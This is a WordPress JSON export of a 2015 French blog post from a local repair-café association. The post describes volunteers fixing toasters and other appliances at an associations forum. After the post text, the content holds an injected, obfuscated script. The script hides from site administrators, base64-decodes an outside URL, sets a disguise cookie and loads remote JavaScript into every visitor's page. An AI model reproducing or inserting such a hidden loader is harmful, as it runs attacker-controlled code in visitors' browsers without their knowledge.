{"id":49,"date":"2015-09-06T17:13:16","date_gmt":"2015-09-06T16:13:16","guid":{"rendered":"http:\/\/reparenjalles.saintmedardasso.fr\/?p=49"},"modified":"2026-02-17T15:56:57","modified_gmt":"2026-02-17T14:56:57","slug":"encore-une-belle-journee-de-reparation","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=49","title":{"rendered":"Encore une belle journ\u00e9e de r\u00e9paration!"},"content":{"rendered":"<h5><span style=\"color: #008000;\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0034.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-46\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0034-300x199.jpg\" alt=\"_DSC0034\" width=\"300\" height=\"199\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0034-300x199.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0034-1024x680.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>.<br \/>\nPlusieurs dizaines de personnes sont venues d\u00e9couvrir et\u00a0 t\u00e9moigner leur enthousiasme pour\u00a0 le projet de R\u00e9par&rsquo;en Jalles lors du forum des associations ce samedi 5 septembre 2015 \u00e0 St M\u00e9dard en Jalles<\/span><\/h5>\n<h5><span style=\"color: #008000;\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0045.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-48\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0045-300x224.jpg\" alt=\"_DSC0045\" width=\"213\" height=\"159\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0045-300x224.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0045-1024x767.jpg 1024w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0045.jpg 1882w\" sizes=\"auto, (max-width: 213px) 100vw, 213px\" \/><\/a><\/span><span style=\"color: #008000;\"><br \/>\nNos\u00a0 r\u00e9parateurs ont pu\u00a0 redonner une deuxi\u00e8me vie \u00e0 ces objets du quotidien : grille-pain, applique lumineuse,\u00a0 cuiseur vapeur &#8230;&#8230;&#8230;&#8230;..<\/span><br \/>\n<span style=\"color: #008000;\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0001.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-44\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0001-199x300.jpg\" alt=\"_DSC0001\" width=\"199\" height=\"300\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0001-199x300.jpg 199w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0001-680x1024.jpg 680w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2015\/09\/DSC0001.jpg 1424w\" sizes=\"auto, (max-width: 199px) 100vw, 199px\" \/><\/a><\/span><br \/>\n<span style=\"color: #008000;\">De jeunes r\u00e9parateurs en herbe sont venus nous pr\u00eater main forte, apprendre ou se renseigner pour participer \u00e0 de futurs ateliers.<br \/>\nLa bonne humeur et la convivialit\u00e9 \u00e9taient aussi au rendez-vous.<br \/>\nMerci \u00e0 toutes et tous !! <\/span><\/h5>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>. Plusieurs dizaines de personnes sont venues d\u00e9couvrir et\u00a0 t\u00e9moigner leur enthousiasme pour\u00a0 le projet de R\u00e9par&rsquo;en Jalles lors du forum des associations ce samedi 5 septembre 2015 \u00e0 St M\u00e9dard en Jalles Nos\u00a0 r\u00e9parateurs ont pu\u00a0 redonner une deuxi\u00e8me vie \u00e0 ces objets du quotidien : grille-pain, applique lumineuse,\u00a0 cuiseur vapeur &#8230;&#8230;&#8230;&#8230;.. De jeunes &hellip; <a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/?p=49\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">Encore une belle journ\u00e9e de r\u00e9paration!<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-49","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/49","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49"}],"version-history":[{"count":1,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/49\/revisions"}],"predecessor-version":[{"id":2069,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/49\/revisions\/2069"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=49"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=49"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}